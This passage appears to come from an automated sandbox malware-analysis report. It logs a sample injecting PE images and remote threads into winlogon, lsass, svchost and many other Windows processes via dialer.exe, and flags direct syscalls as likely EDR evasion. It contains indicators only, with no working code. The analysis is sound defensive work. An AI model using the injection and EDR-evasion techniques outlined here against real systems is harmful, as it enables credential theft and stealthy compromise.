Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2824E8C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21B47B60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20870090000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17184290000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3FA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2108BCF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29166980000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: 1380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F4197C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F8F1A00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 228BE340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 20823A10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 144B2660000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1988E640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F724890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

4_2_00007FF78AB31DB4

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC612908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\dwm.exe EIP: AE262908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87992908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 53772908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D532908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5B382908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 59042908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe EIP: 2C1A2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9E72908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73162908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4E862908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 473C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DC672908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C0B12908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 61332908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AED82908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 87F42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 537D2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D592908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6E92908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5B942908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: ECD72908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 590A2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A9ED2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 731C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4E8C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 47B62908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 70092908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 84292908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D3FA2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A4152908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BDF32908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C0262908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C9F32908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 645B2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 7B2A2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4F62908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2AB42908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4ADB2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\spoolsv.exe EIP: 1992908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 25DA2908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F5352908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F0D62908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: FFB2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C2572908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8BCF2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 66982908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 13EF2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D572908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 69B42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CC742908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5DA72908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199D2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F3892908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3B82908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 40E42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A6532908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 27BC2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B152908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 621A2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F482908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8B4B2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 683D2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1382908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2E262908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6C5E2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D5932908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC652908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 78742908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 33B42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D0A2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AB4C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2A642908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6CF32908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 49352908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 60DA2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5E7B2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F7C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E8152908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 52342908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9DA92908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 602E2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 197C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F1A02908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BE342908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 23A12908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FD902908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C2A32908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B2662908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2C892908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 8E642908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 24892908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A2282908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A22E2908

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	NtAdjustPrivilegesToken: Direct from: 0x7FF750F65BFE			Jump to behavior
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	NtQuerySystemInformation: Direct from: 0x7FF6A0405BFE			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAE260000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87F40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 179537D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25306E90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D5590A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD731C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870090000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184290000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166980000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 1380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
